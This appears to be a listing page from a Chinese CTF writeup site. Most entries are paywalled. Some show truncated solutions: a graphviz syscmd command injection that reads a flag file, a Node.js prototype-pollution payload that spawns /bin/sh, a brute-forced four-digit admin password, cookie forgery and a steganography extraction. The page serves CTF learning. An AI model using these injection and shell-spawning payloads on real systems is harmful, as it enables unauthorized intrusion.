-
HEADache WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1年前
-
command-injection WriteUp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 1年前
-
Request Basics 3
请求头增加 FLAG:n0s即可获得flag
- WEB
- 1年前
-
graphviz++
观察界面,发现功能是聚合两个graphviz对象,diagraph可以在里面通过syscmd写入命令,比如digraph{a0[label="syscmd(`catflag_foxtrot.txt\')"]}脚本代码如下,自行更改HOST和PORTimportrequestsimportosimportreHOST=os.getenv('HOST','82.157.146.43')PORT=os....
- WEB
- 1年前
-
maze js原型链污染
importrequestsimportjsonimportosHOST=os.getenv("HOST","82.157.146.43")PORT=os.getenv("PORT","16154")js="""varp=process.binding('process_wrap').Process;varproc=newp();proc.spawn({file:'/bin/sh',args:['...
- WEB
- 1年前
-
Upload_it_1
点击下方链接进入phpinfo,之后搜索flag
- WEB
- 1年前
-
0xGame-2021-bug1 writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1年前
-
不太普通的图片
下载附件,发现是png使用stegsolve找到password:0xGameyyds使用cloacked-pixel工具python2lsb.pyextractstego.png2.txt0xGameyyds 获取flag为0xGame{Hidd3n_1n_Pic}
- MISC
- 1年前
-
HEADache
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1年前
-
2023第三届陕西省大学生网络安全技能 hack_dns writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1年前
-
0xGame-search
fuff爆破爆出admin/index.php,访问后得知需要登录获取flag,猜测用户名为admin,密码是4位数字爆到flag:0xGame{y0u_brut3_f0rc3_successfully}
- WEB
- 1年前
-
签到题目
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1年前
-
read flag
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1年前
-
Windows server安全配置
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
10 金币
- PAR
- 1年前
-
网络安全事件应急响应
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
20 金币
- PAR
- 1年前
-
look题
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1年前
-
USB
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1年前
-
Whois
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1年前
-
cookiess
不要金币,因为我也不清楚什么鬼情况首先就是随便输个账户密码,注意用户名不能是admin,就能登陆成功根据题目提示是cookie,所以抓包看cookie,有一说一,一开始想到可能是base64编码,但懒得试,后面才去试的把用户名改成admin,再编码,再登陆成功界面,把cookie改成编码后的结果就行了。这题有点问题,我发现很多人在底下留言flag不对,他们的flag和我的flag也不一样,我的也不...
- WEB
- 1年前
-
easyRSA
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 1年前